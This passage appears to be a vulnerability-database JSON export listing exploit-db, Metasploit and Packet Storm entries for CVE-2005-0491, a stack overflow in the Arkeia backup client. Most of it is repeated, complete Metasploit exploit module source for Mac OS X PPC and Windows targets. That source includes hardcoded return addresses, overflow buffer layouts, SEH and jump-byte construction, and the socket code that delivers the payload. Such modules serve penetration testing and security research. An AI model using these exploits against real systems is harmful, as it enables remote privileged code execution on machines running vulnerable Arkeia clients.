Msf::Exploit::Remote::Arkeia\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the Arkeia backup\r\n\t\t\t\tclient for the Mac OS X platform. 
This vulnerability affects\r\n\t\t\t\tall versions up to and including 5.3.3 and has been tested\r\n\t\t\t\twith Arkeia 5.3.1 on Mac OS X 10.3.5.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0491'],\r\n\t\t\t\t\t[ 'OSVDB', '14011'],\r\n\t\t\t\t\t[ 'BID', '12594'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'MinNops' => 700,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ConnectionType' => '-find',\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Arkeia 5.3.1 Stack Return (boot)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t\t'Ret' => 0xbffff910,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tinfo = arkeia_info()\r\n\t\tif !(info and info['Version'])\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tprint_status(\"Arkeia Server Information:\")\r\n\t\tinfo.each_pair { |k,v|\r\n\t\t\tprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\r\n\t\t}\r\n\r\n\t\tif (info['System'] !~ /Darwin/)\r\n\t\t\tprint_status(\"This module only supports Mac OS X targets\")\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\r\n\t\tif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\t# Request has to be big enough to find and small enough\r\n\t\t# not to write off the end of the stack. 
If we write too\r\n\t\t# far down, we also smash env[], which causes a crash in\r\n\t\t# getenv() before our function returns.\r\n\r\n\t\thead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\r\n\t\thead[6, 2] = [1200].pack('n')\r\n\r\n\t\tbuf = rand_text_english(1200, payload_badchars)\r\n\r\n\t\t# Return back to the stack either directly or via system lib\r\n\t\tbuf[0, 112] = [target.ret].pack('N') * (112/4)\r\n\r\n\t\t# Huge nop slep followed by the payload\r\n\t\tbuf[112, payload.encoded.length] = payload.encoded\r\n\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tbegin\r\n\t\t\tsock.put(head)\r\n\t\t\tsock.put(buf)\r\n\t\t\tsock.get_once\r\n\t\trescue IOError, EOFError => e\r\n\t\t\tprint_status(\"Exception: #{e.class}:#{e}\")\r\n\t\tend\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16865/"}], "metasploit": [{"lastseen": "2020-06-01T22:34:55", "description": "This module exploits a stack buffer overflow in the Arkeia backup client for the Mac OS X platform. 
This vulnerability affects all versions up to and including 5.3.3 and has been tested with Arkeia 5.3.1 on Mac OS X 10.3.5.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "Arkeia Backup Client Type 77 Overflow (Mac OS X)", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/OSX/ARKEIA/TYPE77", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Arkeia\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Arkeia backup\n client for the Mac OS X platform. This vulnerability affects\n all versions up to and including 5.3.3 and has been tested\n with Arkeia 5.3.1 on Mac OS X 10.3.5.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0491'],\n [ 'OSVDB', '14011'],\n [ 'BID', '12594']\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'MinNops' => 700,\n 'Compat' =>\n {\n 'ConnectionType' => '-find',\n },\n },\n 'Platform' => %w{ osx },\n 'Targets' =>\n [\n [\n 'Arkeia 5.3.1 Stack Return (boot)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n 'Ret' => 0xbffff910,\n },\n ],\n ],\n 'DisclosureDate' => 'Feb 18 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n info = arkeia_info()\n if !(info and info['Version'])\n return Exploit::CheckCode::Safe\n end\n\n vprint_status(\"Arkeia Server Information:\")\n info.each_pair { |k,v|\n vprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\n }\n\n if (info['System'] !~ /Darwin/)\n vprint_status(\"This module only supports Mac OS X targets\")\n return Exploit::CheckCode::Detected\n end\n\n 
if (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n # Request has to be big enough to find and small enough\n # not to write off the end of the stack. If we write too\n # far down, we also smash env[], which causes a crash in\n # getenv() before our function returns.\n\n head = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\n head[6, 2] = [1200].pack('n')\n\n buf = rand_text_english(1200, payload_badchars)\n\n # Return back to the stack either directly or via system lib\n buf[0, 112] = [target.ret].pack('N') * (112/4)\n\n # Huge nop slep followed by the payload\n buf[112, payload.encoded.length] = payload.encoded\n\n print_status(\"Sending request...\")\n begin\n sock.put(head)\n sock.put(buf)\n sock.get_once\n rescue IOError, EOFError => e\n print_status(\"Exception: #{e.class}:#{e}\")\n end\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/arkeia/type77.rb"}, {"lastseen": "2020-07-24T21:52:01", "description": "This module exploits a stack buffer overflow in the Arkeia backup client for the Windows platform. 
This vulnerability affects all versions up to and including 5.3.3.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "Arkeia Backup Client Type 77 Overflow (Win32)", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/ARKEIA/TYPE77", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Arkeia\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Arkeia backup\n client for the Windows platform. This vulnerability affects\n all versions up to and including 5.3.3.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0491' ],\n [ 'OSVDB', '14011'],\n [ 'BID', '12594'],\n [ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n ['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe\n ['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe\n ['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe\n ['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe\n ['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll\n ['Arkeia 
5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll\n ['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll\n ],\n 'DisclosureDate' => 'Feb 18 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n info = arkeia_info()\n if !(info and info['Version'])\n return Exploit::CheckCode::Safe\n end\n\n vprint_status(\"Arkeia Server Information:\")\n info.each_pair { |k,v|\n vprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\n }\n\n if (info['System'] !~ /Windows/)\n vprint_status(\"This module only supports Windows targets\")\n return Exploit::CheckCode::Detected\n end\n\n if (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n print_status(\"Trying target #{target.name}...\")\n\n head = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\n data = (target['Rets'][1] == 5) ? 
prep_ark5() : prep_ark4()\n head[6, 2] = [data.length].pack('n')\n\n begin\n sock.put(head)\n sock.put(data)\n sock.get_once\n rescue IOError, EOFError => e\n print_status(\"Exception: #{e.class}:#{e}\")\n end\n handler\n disconnect\n end\n\n def prep_ark5\n data = rand_text_english(4096, payload_badchars)\n data[1176, 4] = [target['Rets'][0]].pack('V')\n data[1172, 2] = \"\\xeb\\xf9\"\n data[1167, 5] = \"\\xe98\" + [-1172].pack('V')\n data[0, payload.encoded.length] = payload.encoded\n end\n\n def prep_ark4\n data = rand_text_english(4096, payload_badchars)\n seh = generate_seh_payload( target['Rets'][0] )\n data[ 96, seh.length] = seh\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/arkeia/type77.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:50", "description": "", "published": "2009-10-28T00:00:00", "type": "packetstorm", "title": "Arkeia Backup Client Type 77 Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2009-10-28T00:00:00", "id": "PACKETSTORM:82305", "href": "https://packetstormsecurity.com/files/82305/Arkeia-Backup-Client-Type-77-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Arkeia \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)', \n'Description' => %q{ \nThis module exploits a stack overflow in the Arkeia backup \nclient for the Mac OS X platform. 
This vulnerability affects \nall versions up to and including 5.3.3 and has been tested \nwith Arkeia 5.3.1 on Mac OS X 10.3.5. \n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-0491'], \n[ 'OSVDB', '14011'], \n[ 'BID', '12594'], \n[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'], \n \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'MinNops' => 700, \n'Compat' => \n{ \n'ConnectionType' => '-find', \n}, \n}, \n'Targets' => \n[ \n[ \n'Arkeia 5.3.1 Stack Return (boot)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_PPC, \n'Ret' => 0xbffff910, \n}, \n], \n], \n'DisclosureDate' => 'Feb 18 2005', \n'DefaultTarget' => 0)) \nend \n \ndef check \ninfo = arkeia_info() \nif !(info and info['Version']) \nreturn Exploit::CheckCode::Safe \nend \n \nprint_status(\"Arkeia Server Information:\") \ninfo.each_pair { |k,v| \nprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\") \n} \n \nif (info['System'] !~ /Darwin/) \nprint_status(\"This module only supports Mac OS X targets\") \nreturn Exploit::CheckCode::Detected \nend \n \nif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \n# Request has to be big enough to find and small enough \n# not to write off the end of the stack. If we write too \n# far down, we also smash env[], which causes a crash in \n# getenv() before our function returns. 
\n \nhead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\" \nhead[6, 2] = [1200].pack('n') \n \nbuf = rand_text_english(1200, payload_badchars) \n \n# Return back to the stack either directly or via system lib \nbuf[0, 112] = [target.ret].pack('N') * (112/4) \n \n# Huge nop slep followed by the payload \nbuf[112, payload.encoded.length] = payload.encoded \n \nprint_status(\"Sending request...\") \nbegin \nsock.put(head) \nsock.put(buf) \nsock.get_once \nrescue IOError, EOFError => e \nprint_status(\"Exception: #{e.class}:#{e}\") \nend \nhandler \ndisconnect \nend \n \nend \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82305/type77.rb.txt"}]}